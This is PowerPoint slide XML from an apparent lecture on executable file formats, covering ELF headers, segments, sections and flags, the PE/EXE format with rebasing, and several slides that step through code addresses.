        <p:nvSpPr>
          <p:cNvPr id="995333" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="3771900"/>
            <a:ext cx="1676400" cy="5715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dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Segment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995335" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="217170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Magic number</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995336" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="234315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Addressing info</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995337" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="251460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File type</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995338" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="268605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Arch type</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995339" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="285750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Entry point</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995340" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="302895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Program header </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995341" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="320040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Section header </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995342" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="337185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Header size</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995343" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="2171700"/>
            <a:ext cx="457200" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="line">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995344" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2057400" y="2971800"/>
            <a:ext cx="457200" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="line">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995345" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="4343400"/>
            <a:ext cx="1676400" cy="5715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sz="1400">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995346" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="5086350"/>
            <a:ext cx="1676400" cy="6286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dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Section </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Header </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995347" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3200400" y="4651284"/>
            <a:ext cx="319318" cy="307777"/>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sz="1400">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995348" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="3543300"/>
            <a:ext cx="16764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Size and number of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>entries in program header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995349" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="3943350"/>
            <a:ext cx="16764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Size and number of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>entries in section header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995393" name="Rectangle 65"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="4343400"/>
            <a:ext cx="16764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dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Section</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995394" name="Rectangle 66"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="4572000"/>
            <a:ext cx="16764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dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Section</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995398" name="Text Box 70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A program is seen as a </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>collection of segments by </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the loader and as a </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>collection of sections by the </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>compiler/linker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A segment is usually made </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of several sections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The segment structure is defined in the Program Header Table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The section structure is defined in the Section Header Table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15938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5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53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53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53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53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53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53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539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539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539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9539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953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953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953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953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953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953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953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9534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953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95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1" grpId="0" animBg="1"/>
      <p:bldP spid="995332" grpId="0" animBg="1"/>
      <p:bldP spid="995333" grpId="0" animBg="1"/>
      <p:bldP spid="995335" grpId="0" animBg="1"/>
      <p:bldP spid="995336" grpId="0" animBg="1"/>
      <p:bldP spid="995337" grpId="0" animBg="1"/>
      <p:bldP spid="995338" grpId="0" animBg="1"/>
      <p:bldP spid="995339" grpId="0" animBg="1"/>
      <p:bldP spid="995340" grpId="0" animBg="1"/>
      <p:bldP spid="995341" grpId="0" animBg="1"/>
      <p:bldP spid="995342" grpId="0" animBg="1"/>
      <p:bldP spid="995346" grpId="0" animBg="1"/>
      <p:bldP spid="995347" grpId="0"/>
      <p:bldP spid="995348" grpId="0" animBg="1"/>
      <p:bldP spid="995349" grpId="0" animBg="1"/>
      <p:bldP spid="995393" grpId="0" animBg="1"/>
      <p:bldP spid="99539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150</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="77571" y="261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0x804840e</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357945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ectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1999962" y="5312720"/>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99962" y="6055602"/>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99962" y="5633796"/>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07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19" end="1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xEl>
                                              <p:pRg st="20" end="2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xEl>
                                              <p:pRg st="21" end="2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xEl>
                                              <p:pRg st="22" end="2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xEl>
                                              <p:pRg st="24" end="2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
                                            <p:txEl>
                                              <p:pRg st="25" end="2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
                                            <p:txEl>
                                              <p:pRg st="26" end="2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xEl>
                                              <p:pRg st="27" end="2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xEl>
                                              <p:pRg st="28" end="28"/>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xEl>
                                              <p:pRg st="29" end="29"/>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
                                            <p:txEl>
                                              <p:pRg st="30" end="3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7">
                                            <p:txEl>
                                              <p:pRg st="31" end="31"/>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
                                            <p:txEl>
                                              <p:pRg st="32" end="32"/>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
                                            <p:txEl>
                                              <p:pRg st="33" end="3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xEl>
                                              <p:pRg st="35" end="35"/>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
                                            <p:txEl>
                                              <p:pRg st="36" end="36"/>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7">
                                            <p:txEl>
                                              <p:pRg st="37" end="37"/>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xEl>
                                              <p:pRg st="38" end="38"/>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
                                            <p:txEl>
                                              <p:pRg st="39" end="39"/>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
                                            <p:txEl>
                                              <p:pRg st="40" end="40"/>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7">
                                            <p:txEl>
                                              <p:pRg st="41" end="41"/>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
                                            <p:txEl>
                                              <p:pRg st="42" end="42"/>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7">
                                            <p:txEl>
                                              <p:pRg st="43" end="43"/>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7">
                                            <p:txEl>
                                              <p:pRg st="44" end="44"/>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7">
                                            <p:txEl>
                                              <p:pRg st="45" end="45"/>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0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="108" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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15"/>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0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="120" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>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8" grpId="0" animBg="1"/>
      <p:bldP spid="12" grpId="0" animBg="1"/>
      <p:bldP spid="14" grpId="0" animBg="1"/>
      <p:bldP spid="15"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151</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0x804840e</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357945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8564622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152</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0x804840f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38999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7211994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153</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0x804840f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38999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52719753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154</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0x8048414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415448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8447222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155</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0x8048414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415448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44283062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156</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0x8048417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44305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62339348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0x8048504</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157</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0x8048417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44305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59456726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en-US" sz="1800" smtClean="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</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158</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0x804841e</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471520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65052932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en-US" sz="1800" smtClean="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504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0x8048423</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159</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="79016" y="247560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0x80483f4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5980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607185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82" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ELF Sections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="997383" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each section contains a header that specifies the type of section and the permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PROGBITS: Parts of the program, such as code and data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NOBITS: Parts of the program that do not need space in the file, such as uninitialized data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SYMTAB and DYNSYM: Symbol tables for static and dynamic linking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>STRTAB: The string table used to match identifiers with symbols</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>REL and RELA: Sections that contain relocation information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The flag bits are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ALLOC: the section is allocated in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WRITE: the section is writable </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>EXECINSTR: the section is executable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24789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73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73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73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73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73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73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73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73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73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73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en-US" sz="1800" smtClean="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504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0x8048423</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160</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="79016" y="28465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0x80483f4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5980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88097" y="265336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2652563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en-US" sz="1800" smtClean="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504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0x8048423</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161</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="79016" y="28465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0x80483f5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86548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88097" y="265336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50758733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en-US" sz="1800" smtClean="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504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0x8048423</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162</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="79016" y="28465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0x80483f5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86548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88097" y="265336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21531026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88246"/>
          <a:ext cx="2831284" cy="48768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163</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="105743" y="218445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5110284"/>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0x80483f7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15015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00270765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164</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0x80483f7</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15015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20344680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165</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0x80483fa</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40032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2944738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166</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0x8048504</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0x80483fa</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40032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60228588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167</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smtClean="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</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0x80483fd</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7022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395262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168</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0x8048504</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0x80483fd</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7022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9647438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169</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0x8048401</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19524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299754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4" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Typical ELF Sections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="998457" name="Group 57"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph type="tbl" idx="1"/>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="228600" y="2171701"/>
          <a:ext cx="8686800" cy="3123725"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2171700"/>
                <a:gridCol w="2171700"/>
                <a:gridCol w="2171700"/>
                <a:gridCol w="2171700"/>
              </a:tblGrid>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bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>Name</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bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>Description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bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>Type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bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>Flags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Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>.text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the program’s code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ALLOC and EXECINSTR</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Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>.data</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initialized data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ALLOC and WRITE</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6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.rodata</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read-only data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ALLOC</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.bss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uninitialized data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NOBITS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ALLOC</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5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.init and .fini</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pre and post code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Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>ALLOC and EXECINSTR</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510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8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170</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0x8048404</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2370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213241008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171</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0x8048404</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2370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6169700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172</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0x8048407</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4872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85444518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173</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22998815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174</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73335187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175</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03622895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176</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95518677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177</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29377838"/>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178</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97956810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179</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784447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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The PE File Format</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="993283" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The PE file was introduced to allow MS-DOS programs to be larger than </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>64K (limit of .COM format) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also known as the “EXE” format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Programs are written as if they were always loaded at address 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The program is actually loaded in different points in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The header contains a number of relocation entries that are used at loading time to “fix” the addresses (this procedure is called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>rebasing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="79249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2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2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5 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>ro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
